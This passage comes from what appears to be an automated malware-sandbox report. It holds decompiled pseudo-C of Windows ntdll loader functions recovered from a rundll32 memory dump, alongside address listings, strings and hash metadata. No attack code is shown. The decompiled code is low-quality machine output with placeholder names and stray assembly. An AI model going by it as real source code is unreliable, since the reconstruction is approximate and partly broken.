						_t275 = L045F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0461F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04621370(_v16, 0x45b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0461BB40(_t262,  &_v68, _t244);
								if(L045E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04621370(_t282, 0x45b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0461BB40(_t262,  &_v68, _t201);
							if(L045E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L045F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0461F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04621370(_t280, 0x45b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0461BB40(_t267,  &_v68, _t245);
							if(L045E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04621370(_t284, 0x45b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0461BB40(_t267,  &_v68, _t224);
						if(L045E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                            0x045e3d3c
                                                                                            0x045e3d42
                                                                                            0x045e3d44
                                                                                            0x045e3d46
                                                                                            0x045e3d49
                                                                                            0x045e3d4c
                                                                                            0x045e3d4f
                                                                                            0x045e3d52
                                                                                            0x045e3d55
                                                                                            0x045e3d58
                                                                                            0x045e3d5b
                                                                                            0x045e3d5f
                                                                                            0x045e3d61
                                                                                            0x045e3d66
                                                                                            0x04638213
                                                                                            0x04638218
                                                                                            0x045e4085
                                                                                            0x045e4088
                                                                                            0x045e408e
                                                                                            0x045e4094
                                                                                            0x045e409a
                                                                                            0x045e40a0
                                                                                            0x045e40a6
                                                                                            0x045e40a9
                                                                                            0x045e40af
                                                                                            0x045e40b6
                                                                                            0x045e40bd
                                                                                            0x045e40bd
                                                                                            0x045e3d83
                                                                                            0x0463821f
                                                                                            0x04638229
                                                                                            0x04638238
                                                                                            0x04638238
                                                                                            0x0463823d
                                                                                            0x0463823d
                                                                                            0x045e3da0
                                                                                            0x045e3daf
                                                                                            0x045e3db5
                                                                                            0x045e3dba
                                                                                            0x045e3dba
                                                                                            0x045e3dd4
                                                                                            0x045e3e94
                                                                                            0x045e3eab
                                                                                            0x045e3f6d
                                                                                            0x045e3f84
                                                                                            0x045e406b
                                                                                            0x045e406b
                                                                                            0x045e406e
                                                                                            0x045e406e
                                                                                            0x045e4070
                                                                                            0x045e4074
                                                                                            0x04638351
                                                                                            0x04638351
                                                                                            0x045e407a
                                                                                            0x045e407f
                                                                                            0x0463835d
                                                                                            0x04638370
                                                                                            0x04638377
                                                                                            0x04638379
                                                                                            0x0463837c
                                                                                            0x0463837c
                                                                                            0x0463835d
                                                                                            0x00000000
                                                                                            0x045e407f
                                                                                            0x045e3f8a
                                                                                            0x045e3f8d
                                                                                            0x045e3f90
                                                                                            0x045e3f95
                                                                                            0x0463830d
                                                                                            0x0463830f
                                                                                            0x045e3f9b
                                                                                            0x045e3fac
                                                                                            0x045e3fae
                                                                                            0x045e3fb1
                                                                                            0x045e3fb1
                                                                                            0x045e3fb6
                                                                                            0x04638317
                                                                                            0x0463831a
                                                                                            0x00000000
                                                                                            0x045e3fbc
                                                                                            0x045e3fc1
                                                                                            0x045e3fc9
                                                                                            0x045e3fd7
                                                                                            0x045e3fda
                                                                                            0x045e3fdd
                                                                                            0x045e4021
                                                                                            0x045e4021
                                                                                            0x045e4029
                                                                                            0x045e4030
                                                                                            0x045e4044
                                                                                            0x045e4046
                                                                                            0x045e4046
                                                                                            0x045e4044
                                                                                            0x045e4049
                                                                                            0x04638327
                                                                                            0x04638334
                                                                                            0x04638339
                                                                                            0x0463833c
                                                                                            0x045e404f
                                                                                            0x045e404f
                                                                                            0x045e404f
                                                                                            0x045e4051
                                                                                            0x045e4056
                                                                                            0x045e4063
                                                                                            0x045e4063
                                                                                            0x045e4068
                                                                                            0x00000000
                                                                                            0x045e4068
                                                                                            0x045e3fdf
                                                                                            0x045e3fe2
                                                                                            0x045e3fe4
                                                                                            0x045e3fe7
                                                                                            0x045e3fef
                                                                                            0x045e4003
                                                                                            0x045e4005
                                                                                            0x045e4005
                                                                                            0x045e400c
                                                                                            0x045e4013
                                                                                            0x045e4016
                                                                                            0x045e4017
                                                                                            0x045e401b
                                                                                            0x045e401e
                                                                                            0x00000000
                                                                                            0x045e401e
                                                                                            0x045e3fb6
                                                                                            0x045e3eb1
                                                                                            0x045e3eb4
                                                                                            0x045e3eb7
                                                                                            0x045e3ebc
                                                                                            0x046382a9
                                                                                            0x046382ab
                                                                                            0x045e3ec2
                                                                                            0x045e3ed3
                                                                                            0x045e3ed5
                                                                                            0x045e3ed8
                                                                                            0x045e3ed8
                                                                                            0x045e3edd
                                                                                            0x046382b3
                                                                                            0x046382b6
                                                                                            0x00000000
                                                                                            0x045e3ee3
                                                                                            0x045e3ee8
                                                                                            0x045e3eed
                                                                                            0x045e3ef0
                                                                                            0x045e3ef3
                                                                                            0x045e3f02
                                                                                            0x045e3f05
                                                                                            0x045e3f08
                                                                                            0x046382c0
                                                                                            0x046382c3
                                                                                            0x046382c5
                                                                                            0x046382c8
                                                                                            0x046382d0
                                                                                            0x046382e4
                                                                                            0x046382e6
                                                                                            0x046382e6
                                                                                            0x046382ed
                                                                                            0x046382f4
                                                                                            0x046382f7
                                                                                            0x046382f8
                                                                                            0x046382fc
                                                                                            0x046382ff
                                                                                            0x046382ff
                                                                                            0x045e3f0e
                                                                                            0x045e3f11
                                                                                            0x045e3f16
                                                                                            0x045e3f1d
                                                                                            0x045e3f31
                                                                                            0x04638307
                                                                                            0x04638307
                                                                                            0x045e3f31
                                                                                            0x045e3f39
                                                                                            0x045e3f48
                                                                                            0x045e3f4d
                                                                                            0x045e3f50
                                                                                            0x045e3f50
                                                                                            0x045e3f53
                                                                                            0x045e3f58
                                                                                            0x045e3f65
                                                                                            0x045e3f65
                                                                                            0x045e3f6a
                                                                                            0x00000000
                                                                                            0x045e3f6a
                                                                                            0x045e3edd
                                                                                            0x045e3dda
                                                                                            0x045e3ddd
                                                                                            0x045e3de0
                                                                                            0x045e3de5
                                                                                            0x04638245
                                                                                            0x045e3deb
                                                                                            0x045e3df7
                                                                                            0x045e3dfc
                                                                                            0x045e3dfe
                                                                                            0x045e3e01
                                                                                            0x045e3e01
                                                                                            0x045e3e06
                                                                                            0x0463824d
                                                                                            0x0463824f
                                                                                            0x04638254
                                                                                            0x00000000
                                                                                            0x045e3e0c
                                                                                            0x045e3e11
                                                                                            0x045e3e16
                                                                                            0x045e3e19
                                                                                            0x045e3e29
                                                                                            0x045e3e2c
                                                                                            0x045e3e2f
                                                                                            0x0463825c
                                                                                            0x0463825f
                                                                                            0x04638261
                                                                                            0x04638264
                                                                                            0x0463826c
                                                                                            0x04638280
                                                                                            0x04638282
                                                                                            0x04638282
                                                                                            0x04638289
                                                                                            0x04638290
                                                                                            0x04638293
                                                                                            0x04638294
                                                                                            0x04638298
                                                                                            0x0463829b
                                                                                            0x0463829b
                                                                                            0x045e3e35
                                                                                            0x045e3e38
                                                                                            0x045e3e3d
                                                                                            0x045e3e44
                                                                                            0x045e3e58
                                                                                            0x046382a3
                                                                                            0x046382a3
                                                                                            0x045e3e58
                                                                                            0x045e3e60
                                                                                            0x045e3e6f
                                                                                            0x045e3e74
                                                                                            0x045e3e77
                                                                                            0x045e3e77
                                                                                            0x045e3e7a
                                                                                            0x045e3e7f
                                                                                            0x045e3e8c
                                                                                            0x045e3e8c
                                                                                            0x045e3e91
                                                                                            0x00000000
                                                                                            0x045e3e91

                                                                                            Strings
                                                                                            • Kernel-MUI-Language-SKU, xrefs: 045E3F70
                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 045E3E97
                                                                                            • WindowsExcludedProcs, xrefs: 045E3D6F
                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 045E3DC0
                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 045E3D8C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                            • API String ID: 0-258546922
                                                                                            • Opcode ID: 841e70cfd7866bc90c79a6dd58c1fbc064638b984af45d29c390333197dc4f19
                                                                                            • Instruction ID: 776bfb1611f9cb4123152917568eeccce037b025c1e2d4575ae7425ddf94209f
                                                                                            • Opcode Fuzzy Hash: 841e70cfd7866bc90c79a6dd58c1fbc064638b984af45d29c390333197dc4f19
                                                                                            • Instruction Fuzzy Hash: 78F16972D00659EFDB15DF99C980AEEBBB9FF49740F14006AE905A7211E734BE01DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04608E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 44%
                                                                                            			E04608E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x46cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x46c8464; // 0x76d90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x46c5780 & 0x00000003) != 0) {
							E04655510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x46c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0461B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x46c7984; // 0x29e2af0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x46c8464; // 0x76d90110
					 *0x46cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04609B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x46c5780 & 0x00000005) != 0) {
						_push(_t49);
						E04655510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                            0x04608e0f
                                                                                            0x04608e16
                                                                                            0x04608e19
                                                                                            0x04608e1b
                                                                                            0x04608e21
                                                                                            0x04608e7f
                                                                                            0x04608e85
                                                                                            0x04649354
                                                                                            0x0464936c
                                                                                            0x04649371
                                                                                            0x0464937b
                                                                                            0x04649381
                                                                                            0x04649381
                                                                                            0x0464937b
                                                                                            0x04608e9d
                                                                                            0x04608e9d
                                                                                            0x04608e29
                                                                                            0x04608e2c
                                                                                            0x04608e38
                                                                                            0x04608e3e
                                                                                            0x04608e43
                                                                                            0x04608eb5
                                                                                            0x04608eb9
                                                                                            0x046492aa
                                                                                            0x046492af
                                                                                            0x046492e8
                                                                                            0x046492e8
                                                                                            0x046492af
                                                                                            0x04608eb9
                                                                                            0x04608e45
                                                                                            0x04608e53
                                                                                            0x04608e5b
                                                                                            0x04608e5f
                                                                                            0x04608e78
                                                                                            0x04608e78
                                                                                            0x04608e7d
                                                                                            0x04608ec3
                                                                                            0x04608ecd
                                                                                            0x04608ed2
                                                                                            0x04608ed2
                                                                                            0x04608ec5
                                                                                            0x04608ec5
                                                                                            0x00000000
                                                                                            0x04608e7d
                                                                                            0x04608e67
                                                                                            0x04608ea4
                                                                                            0x0464931a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04649320
                                                                                            0x04608ea4
                                                                                            0x04608e70
                                                                                            0x04649325
                                                                                            0x04649340
                                                                                            0x04649345
                                                                                            0x04649345
                                                                                            0x04608e76
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0464932A
                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 04649357
                                                                                            • LdrpFindDllActivationContext, xrefs: 04649331, 0464935D
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0464933B, 04649367
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-3779518884
                                                                                            • Opcode ID: 185713b75761d9afc47b71bbd1b56c62d5bd74c56ea888948e88c3e5dd1b572b
                                                                                            • Instruction ID: 0b2a43a0e428a1f748529fc99dbbea678111f5ffa0b9d3a8d9a8126c5d5e63bc
                                                                                            • Opcode Fuzzy Hash: 185713b75761d9afc47b71bbd1b56c62d5bd74c56ea888948e88c3e5dd1b572b
                                                                                            • Instruction Fuzzy Hash: EF41F232A40315AFDB29FE18C849A7BB7A5BB65354F09C16AE944572D2F770BC8086C1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 83%
                                                                                            			E045E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E045E934A() != 0) {
								_t159 = E0465A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x46c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04655510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x46c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E045E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E045E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E045E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x46c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x46c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E045F2280(_t92, 0x46c86cc);
															_t94 = E046A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E046061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x46c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E045E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x46c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x46c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0461F380(_t136, 0x45b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E045F2280(_t108, 0x46c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E046061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E046A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E045EFFB0(_t118, _t156, 0x46c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04619A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                            0x045e8799
                                                                                            0x045e879d
                                                                                            0x045e87a1
                                                                                            0x045e87a3
                                                                                            0x045e87a8
                                                                                            0x045e87c3
                                                                                            0x045e87c3
                                                                                            0x045e87c8
                                                                                            0x045e87d1
                                                                                            0x045e87d4
                                                                                            0x045e87d8
                                                                                            0x045e87e5
                                                                                            0x045e87ec
                                                                                            0x04639bfe
                                                                                            0x04639c00
                                                                                            0x04639c02
                                                                                            0x04639c08
                                                                                            0x04639c0d
                                                                                            0x04639c0f
                                                                                            0x04639c14
                                                                                            0x04639c2d
                                                                                            0x04639c32
                                                                                            0x04639c37
                                                                                            0x04639c3a
                                                                                            0x04639c3c
                                                                                            0x04639c42
                                                                                            0x04639c42
                                                                                            0x04639c3c
                                                                                            0x04639c02
                                                                                            0x045e87da
                                                                                            0x045e87df
                                                                                            0x045e87e3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e87e3
                                                                                            0x045e87f2
                                                                                            0x00000000
                                                                                            0x045e87fb
                                                                                            0x045e87fd
                                                                                            0x045e87fe
                                                                                            0x045e880e
                                                                                            0x045e880f
                                                                                            0x045e8810
                                                                                            0x045e8814
                                                                                            0x045e881a
                                                                                            0x045e881c
                                                                                            0x045e881f
                                                                                            0x045e8821
                                                                                            0x045e8822
                                                                                            0x045e8824
                                                                                            0x045e8826
                                                                                            0x045e882c
                                                                                            0x045e882e
                                                                                            0x04639c48
                                                                                            0x04639c48
                                                                                            0x045e8834
                                                                                            0x045e8834
                                                                                            0x045e8837
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e8837
                                                                                            0x045e882e
                                                                                            0x045e883d
                                                                                            0x045e8840
                                                                                            0x045e8843
                                                                                            0x045e8846
                                                                                            0x045e8849
                                                                                            0x045e884c
                                                                                            0x045e884e
                                                                                            0x045e8850
                                                                                            0x045e8852
                                                                                            0x045e8854
                                                                                            0x045e8857
                                                                                            0x045e88b4
                                                                                            0x045e88b6
                                                                                            0x045e88b6
                                                                                            0x045e8859
                                                                                            0x045e8859
                                                                                            0x045e8859
                                                                                            0x045e8861
                                                                                            0x045e8866
                                                                                            0x045e886a
                                                                                            0x045e893d
                                                                                            0x045e8941
                                                                                            0x00000000
                                                                                            0x045e8947
                                                                                            0x045e8947
                                                                                            0x045e894a
                                                                                            0x045e894c
                                                                                            0x00000000
                                                                                            0x045e8952
                                                                                            0x045e8955
                                                                                            0x045e895a
                                                                                            0x045e895d
                                                                                            0x045e895d
                                                                                            0x045e895f
                                                                                            0x045e8961
                                                                                            0x045e8961
                                                                                            0x045e8968
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e896a
                                                                                            0x045e896b
                                                                                            0x045e896e
                                                                                            0x00000000
                                                                                            0x045e8970
                                                                                            0x045e8970
                                                                                            0x045e8970
                                                                                            0x045e8970
                                                                                            0x045e8972
                                                                                            0x045e8972
                                                                                            0x045e8974
                                                                                            0x00000000
                                                                                            0x045e897a
                                                                                            0x045e897a
                                                                                            0x045e897d
                                                                                            0x00000000
                                                                                            0x045e8983
                                                                                            0x04639c65
                                                                                            0x04639c6d
                                                                                            0x04639c72
                                                                                            0x04639c75
                                                                                            0x04639c75
                                                                                            0x04639c82
                                                                                            0x04639c86
                                                                                            0x04639c87
                                                                                            0x04639c88
                                                                                            0x04639c89
                                                                                            0x04639c8c
                                                                                            0x04639c90
                                                                                            0x04639c95
                                                                                            0x04639c97
                                                                                            0x04639ca0
                                                                                            0x04639ca3
                                                                                            0x04639ca9
                                                                                            0x04639ca9
                                                                                            0x00000000
                                                                                            0x04639ca9
                                                                                            0x04639ca3
                                                                                            0x00000000
                                                                                            0x04639c97
                                                                                            0x045e897d
                                                                                            0x00000000
                                                                                            0x045e8974
                                                                                            0x045e8988
                                                                                            0x045e8992
                                                                                            0x045e8996
                                                                                            0x00000000
                                                                                            0x045e8996
                                                                                            0x045e894c
                                                                                            0x00000000
                                                                                            0x045e8870
                                                                                            0x045e887b
                                                                                            0x045e887d
                                                                                            0x045e887f
                                                                                            0x045e8881
                                                                                            0x045e8884
                                                                                            0x045e8884
                                                                                            0x045e8886
                                                                                            0x045e8889
                                                                                            0x045e888c
                                                                                            0x045e888e
                                                                                            0x045e8891
                                                                                            0x045e8891
                                                                                            0x045e8898
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e889a
                                                                                            0x045e889b
                                                                                            0x045e889e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e88a0
                                                                                            0x045e88a8
                                                                                            0x045e88b0
                                                                                            0x045e88b2
                                                                                            0x045e88d3
                                                                                            0x045e88d5
                                                                                            0x00000000
